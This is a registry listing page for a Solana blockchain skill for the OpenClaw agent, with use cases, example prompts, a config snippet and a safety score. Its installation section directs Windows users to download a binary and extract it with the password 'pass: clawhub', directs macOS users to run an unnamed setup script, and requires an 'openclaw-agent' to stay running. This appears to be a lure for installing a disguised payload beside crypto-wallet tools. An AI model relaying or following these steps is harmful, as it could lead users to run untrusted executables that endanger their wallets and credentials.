ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Efficiently interact with the Solana blockchain. Manage wallet balances, monitor SPL tokens, inspect NFT metadata, and track transactions with the OpenClaw Solana skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-a8wjy
Or

What This Skill Does

The Solana skill for OpenClaw provides a comprehensive command-line interface suite for interacting with the Solana blockchain. It acts as a bridge between the OpenClaw agent and the Solana ecosystem, allowing users to query account data, monitor balances in real-time, inspect transaction histories, and analyze SPL token holdings. Designed for both developers and crypto enthusiasts, this skill supports full interaction with Phantom and Solflare addresses, providing deep insights into wallet activity, NFT metadata, and stake account status without needing a web interface.

Installation

To begin, ensure you have the openclaw-agent utility installed. On Windows, download the provided binary from the GitHub repository and extract it using the password 'pass: clawhub'. For macOS users, execute the provided setup script via the terminal to configure the environment. Once the agent is active, install the Solana CLI tools by running the official shell command. After installation, set your preferred RPC node to the mainnet-beta endpoint using the solana config set command. Finally, execute clawhub install openclaw/skills/skills/hightower6eu/solana-a8wjy within your OpenClaw environment to integrate the skill.

Use Cases

This skill is perfect for developers needing to programmatically check wallet balances, audit token holdings, or verify transactions without manually visiting block explorers. It is also an excellent tool for market monitoring, as users can set up automated watch-loops for whale tracking or specific address balance changes. Furthermore, the inclusion of Metaboss integration allows for quick NFT metadata retrieval, making it a powerful utility for NFT collectors and project managers needing to verify mint information, rarity, or creator data directly from the CLI.

Example Prompts

  1. "Check the current SOL balance and recent transaction history for address 7C4jsP... and display it in JSON format."
  2. "List all SPL tokens and their respective balances for my wallet address 5KjH8x..."
  3. "Monitor the balance of this whale address 9xR6sD... every 5 seconds and alert me if there is a significant change."

Tips & Limitations

Always ensure the openclaw-agent is running in the background before attempting commands; operations will fail if the utility is not active. When performing heavy lookups, use the JSON output flag for easier parsing in custom scripts. Note that this tool interacts with public RPC nodes; if you require high-frequency requests, consider configuring a private RPC provider URL to avoid rate limiting. Always double-check your public keys to avoid accidental data leakage or incorrect query execution.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-a8wjy": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#web3#fintech
Safety Score: 4/5

Flags: network-access, external-api, code-execution